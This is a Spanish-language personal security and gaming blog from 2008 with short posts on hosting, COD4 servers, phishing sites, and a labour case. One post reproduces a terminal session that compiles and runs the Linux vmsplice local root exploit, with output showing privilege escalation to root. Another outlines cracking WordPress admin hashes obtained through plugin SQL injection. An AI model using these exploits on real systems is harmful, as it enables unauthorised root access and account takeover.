Ya esta todo listo para mudar a nuestros servidores de SvHosting y no seguir con el servidor actual, tambien en la compra de un dominio Info.
Todavia estoy esperando algunas cosas que nuestros proveedores arreglen y claro cancelar la otra cuenta con el otro proveedor.
Al momento de movernos y cambiar nuestro dominio, este dominio uni.cc redireccionara a nuestro nuevo dominio y host.
Espero que siempre visiten mi blog y lean mis entradas.
Agradesco a la Kobra y a Kurt por estar leyendo mis locuras siempre y pues a kurt porque aun se acuerda de nuestro otro blog ShadowSecurity que ya tiene mas de un año de estar en linea.
Segun leo en Seguinfo facebook esta sirviendo para obtener informacion de familiares de soldados Canadienses en Afganistan. Al Qaeda busca informacion de los familiares para poner presion en los soldados canadienses.
El departamento de defensa canadiense avisa a los soldados y sus familiares para no poner fotos en el facebook para que no sean reconocidos y luego puedan ser victimas de algo.
La noticia completa la puedes leer aqui.
(more…)
Ξ February 25th, 2008 | → 0 Comments | ∇ Juegos |
Ultimamente he pasado jugando mucho cod4, tambien juego cod2 y empezare a jugar counter strike source para PC. Lo mas sorprendete de cod4 son las graficos que tiene y hay tanta gente para jugar online.
con algunos amigos hemos creados dos clanes para jugar en torneos, los torneos pueden ser de 1v1, 2v2, 3v3 y 4v4 proximamente se agregaran mas.
La pagina es algo interesante pero los torneos que mas se llevan acabo son para xbox 360 y ps3.
Ya tuve mi primer batalla de 1v1 y la perdi, estoy esperando una nueva batalla que tendre dentro de poco.
A todos los interesados en entrar en torneos de cod4 para xbox 360, ps3 y Pc pueden visitar esta pagina registrarse y empezar a competir en torneos creados por propios usuarios y administradores.
Ahora leyendo seguinfo veo un post donde hacen una revision completa de como pueden hacerce de sus numeros de tarjetas y daots personales mediante paginas que simulan vender productos, pero en realidad son nua metira ya que lo unico que hacen es obtener numeros de tarjetas y datos personales.
Ellos ponen un ejemplo claro de una pagina que es usada para hacer ese tipo de estafa, creo que la gente que recibe correos de ese tipo spam o entra a comprar por internet en paginas que se miran fakes no inspiran confianza deberian evitarse ese tipo de paginas y evitar ser victimas de un robo online.
En seguinfo enseñan un poco de como ver si el sitio es falso, aqui les pongo la noticia para que la revisen
(more…)
Voy a enseñar como crear un servidor de Call Of Duty4 (COD4), primero lo que tienen que hacer es abrir lel puerto de el router.
UDP : 28960
tiene que abrir ese puerto, luego habilitarlo si tienen firewall para que no de problemas a la hora que le den la ip a sus amigos para que entren a jugar en su server.
Despues copian el shorcut de cod4 que esta en el escritorio y lo pegan en un folder aparte, le dan click derecho y se van a propiedades, donde dice target hacen lo siguiente: despues de elexe dejan un espacio y le ponen +set dedicated 2 +set sv_punkbuster 1 +exec server.cfg +map_rotate y les queda de esta forma.
“C:\Program Files\Activision\Call of Duty 4 - Modern Warfare\nombre del exe .exe” +set dedicated 2Â +set sv_punkbuster 1 +exec server.cfg +map_rotate
Ahora bajan estos archivos cod4
luego que los tienen los archivos que son ext CFG los ponen en el main folden en donde esta instalado call of duty 4. El otro archivo que se llama exe es un ejecutable ese archivo lo guardan en donde estan los demas ejecutables del programa y lo dejan con el nombre de SERVER.exe ya que ahora volveran a modificar el shortcut y les quedara de esta forma.
“C:\Program Files\Activision\Call of Duty 4 - Modern Warfare\server.exe” +set dedicated 2Â +set sv_punkbuster 1 +exec server.cfg +map_rotate
Al tener todo esto nada mas abres el servidore dandole doble click al shorcut que esta en el folder con las modificaciones y ya le puedes pasar a tus amigos la IP para que entren a jugar entu servidor.
Debiado a estudios y otras cosas esta semana no estare posteando muy seguido.
Espero volver a hacerlo apartir de el lunes proximo.
Un exploit interesante ha salido para ubuntu y debaian, el exploit tiene q ejecutarse localmente para tener acceso de root en el sistema.
Los Kernel Linux afectados son desde la versión 2.6.17 hasta 2.6.24.1. Por el momento para solucionar el problema de seguridad, habrÃa que compilar nuestro propio kernel eliminando vmsplice.
Los exploits funcionan perfectamente y pueden verlos aqui exploit y este otro.
En seguinfo han probado el exploit y les ha funcionado perfectamente. aqui esta el ejemplo
Kernel 2.6.22-14-generic:
$ gcc exploit.c -o exploit
$ whoami
heikki
$ ./exploit
——-
——-——-——-——-
Linux vmsplice Local Root Exploit
By qaaz
——-——-——-——-——-
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0xb7d90000 .. 0xb7dc2000
[+] root
$ whoami
root
Se ve que hasta el software libre tiene sus problemas, pero es mejor que Windows claro.
Ya esta tambien el parche para solucionar el problema y tambien se puede actualizar el Kernel consiguiendo aqui nueva versión del kernel (2.6.24.2) con el bug resuelto
Un hombre fue despedido por pasar informacion via msn a la competencia de la compañia con la que trabaja. Segun lei en shadow security aqui les dejo el articulo.
Despedido por usar el Messenger
La Cámara Nacional de Apelaciones del Trabajo, en un fallo contrario al de primera instancia (en el que se habÃa considerado que al empleado fue despedido sin causa justificada), consideró que el empleador despidio con justa causa a un trabajador de la firma Microstar por haber pasado precios de cotizaciones a la competencia a traves del MSN.
Entre otras cosas dijo que esta conducta implicó la violación del deber de fidelidad, en tanto afectó la lealtad y confianza mutua que deben primar en un contrato de trabajo, y habilitaba al empleador a considerar que esa conducta podrÃa reiterarse; asà como el deber de buena fe, propio también de la relación laboral.
Lo interesante de esto es que consideró probada la falta por dichos y no por ninguna pericia tecnica. Un testigo dijo haber visto la conversacion en la pantalla, pero nunca se hicieron capturas ni pericias sobre la terminal del usuario.
El fallo completo se puede leer en el Fallo Laboral de MSN.
http://shadowsecurity.uni.cc/despedido-por-usar-el-messenger/
Ultimamente muchos blogger de wordpress o joomla estan siendo atacados, muchos lammers turcos o de otros lados estan usando exploits que s encuentran en milw0rm para atacar a los bloggers.
Desde hace dos semanas he venido revisando milw0rm mas seguido de lo que lo hacia antes, y cada vez mas veo que los exploits para plugins o scripts de wordpress y joomla estan siendo usados para atacar blogs.
Hace 3 dias no tenia nada que hacer y me puse a revisar 3 exploits de plugins para wordpress y efectivamente los ataques de sql injection sirven muy bien y se pueden tener acceso a la contraseña y usuario de wordpress.
Al tener la contraseña en su forma encriptada nada mas se usa un programa como rimbow crack o se va a una pagina para desencriptar la MD5 y ya se sabra el password de el administrador del sitio.
Mucha gente se esta aprovechando de ese y estan atacando a los blogger, nada mas me queda decir que hay que tener actualizados los scripts y plugins o todo lo que esten usando en su pagina web.
Mi amigo Kobra no se de donde a sacado la idea de hacer un plugin para wordpress pero se lo hizo, uso un poco de ingenio para modificar un codigo de un plugin ya creado y lo modifico para que uso.
El plugin esta en su version 0.1 y al parecer es muy bueno (no lo he probado aun), aqui les dejare el link para que visiten su blog y prueben su plugin a ver que opinan de el.
http://www.mundoenfermo.net/plugin-tubeasyÂ
Next Page »
